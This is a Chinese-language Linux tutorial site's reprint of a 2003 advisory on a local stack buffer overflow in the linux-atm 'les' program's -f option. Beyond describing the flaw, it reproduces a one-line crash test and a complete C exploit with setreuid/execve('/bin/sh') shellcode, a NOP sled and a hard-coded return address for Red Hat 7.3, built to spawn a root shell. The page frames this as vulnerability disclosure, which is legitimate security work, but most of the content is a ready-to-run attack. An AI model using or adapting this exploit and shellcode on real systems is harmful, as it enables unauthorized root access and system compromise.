歡迎來到Linux教程網
Linux教程網
Linux教程網
Linux教程網
您现在的位置: Linux教程網 >> UnixLinux >  >> Linux綜合 >> Linux命令

Linux-ATM LES命令行參數本地緩沖區溢出

Linux命令 涉及程序:
linux-atm les 2.4
 
描述:
Linux-ATM LES命令行參數本地緩沖區溢出
 
詳細:
Linux當前支持ATM,目前是實驗階段,支持RAW ATM連接、IP通過ATM、LAN模擬、MPOA等功能。

linux-atm 'les'可執行文件對命令行參數缺少正確的緩沖區邊界檢查,本地攻擊者可以利用這個漏洞進行緩沖區溢出攻擊,可能以root用戶權限在系統上執行任意指令。

'/usr/local/sbin/les'程序對用戶提交給-f選項的數據缺少正確邊界檢查,提交超過252字節的數據可觸發緩沖區溢出,精心構建提交數據可能以root用戶權限在系統上執行任意指令。
 
 
攻擊方法:
Angelo Rosiello ([email protected])提供了如下測試方法:

/usr/local/sbin/les -f `perl -e 'print "A"x252'`

Angelo Rosiello([email protected]) 提供了如下測試程序:

/*
*** Exploit against the linux-atm project
***
*** http://sourceforge.net/projects/linux-atm
***************************************************************
*** VULNERABILITY
***
*** Stack Overflow discovered by Angelo Rosiello
*** /usr/local/sbin/les -f `perl -e 'print "A"x252'`
*** Program received signal SIGSEGV, Segmentation fault.
*** 0x41414141 in ?? ()
****************************************************************
*** AUTHOR: Angelo Rosiello
*** CONTACT: [email protected], [email protected]
*** [email protected]
***
*** Copyright (c) 2003 DTORS Security
*** All rights reserved.
*** http://dtors.net
***
*** SHELLCODE by esDee
***
*** 18/02/2003
***
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define NOP 0x90 // No operation instruction
#define LEN 252 // Our buffer size

void usage();

static char shellcode[] =

 // setreuid(0,0);
 "\x31\xc0" // xor %eax,%eax
 "\x31\xdb" // xor %ebx,%ebx
 "\x31\xc9" // xor %ecx,%ecx
 "\xb0\x46" // mov $0x46,%al
 "\xcd\x80" // int $0x80

 // execve /bin/sh
 "\x31\xc0" // xor %eax,%eax
 "\x50" // push %eax
 "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
 "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
 "\x89\xe3" // mov %esp,%ebx
 "\x8d\x54\x24\x08" // lea 0x8(%esp,1),%edx
 "\x50" // push %eax
 "\x53" // push %ebx
 "\x8d\x0c\x24" // lea (%esp,1),%ecx
 "\xb0\x0b" // mov $0xb,%al
 "\xcd\x80" // int $0x80

 // exit();
 "\x31\xc0" // xor %eax,%eax
 "\xb0\x01" // mov $0x1,%al
 "\xcd\x80"; // int $0x80

struct
{
int number;
char *version;
long ret;
char path[256];
} target[] =
{
{1," Red Hat Linux release 7.3 (Valhalla)",
0xbffff860, "/usr/local/sbin/les"},
{2," No defined", 0xffffffff , "/usr/local/sbin/les"},
};

main(int argc, char *argv[])
{
 char buffer[LEN];
 int i;
 long ret;
 char *PATH;
 int selection;
 if(argc == 1)
 {
 usage((char **)argv[0]);
 exit(1);
 }
 selection = atoi(argv[2]);

 printf("Ret = 0x%lx and PATH= %s\n", target[selection-1].ret, (char **)target[selection-1].path);
 printf("\nCopyright (c) 2003 DTORS Security\n");
 printf("ANGELO ROSIELLO 18/02/2003\n");
 printf("\tLES-EXPLOIT for Linux x86\n\n");

 ret = target[selection-1].ret;
 PATH = target[selection-1].path;
 // Build the overflow string.
 for (i = 0; i < LEN; i += 4) *(long *) &buffer[i] = ret;

 // copy NOP
 for (i=0; i<(LEN-strlen(shellcode)-25);i++) *(buffer+i) = NOP;

 // Copy the shellcode into the buffer.
 memcpy(buffer+i,shellcode,strlen(shellcode));

 // Execute the program
 execl(PATH, "les", "-f", buffer, NULL);
}

void usage(char *argv[])
{
 int i = 0;
 printf("\nUsage:\n%s -t [target number]\n\nTargets\n",*(char **)&argv);
 while(target[i].number)
 {
 printf("[%d] %s \n", target[i].number, target[i].version);
 i++;
 }
}
 
 
解決方案:
目前廠商還沒有提供補丁或者升級程序,建議用戶隨時關注廠商的主頁以獲取最新版本:

http://sourceforge.net/projects/linux-atm
 
附加信息:

Copyright © Linux教程網 All Rights Reserved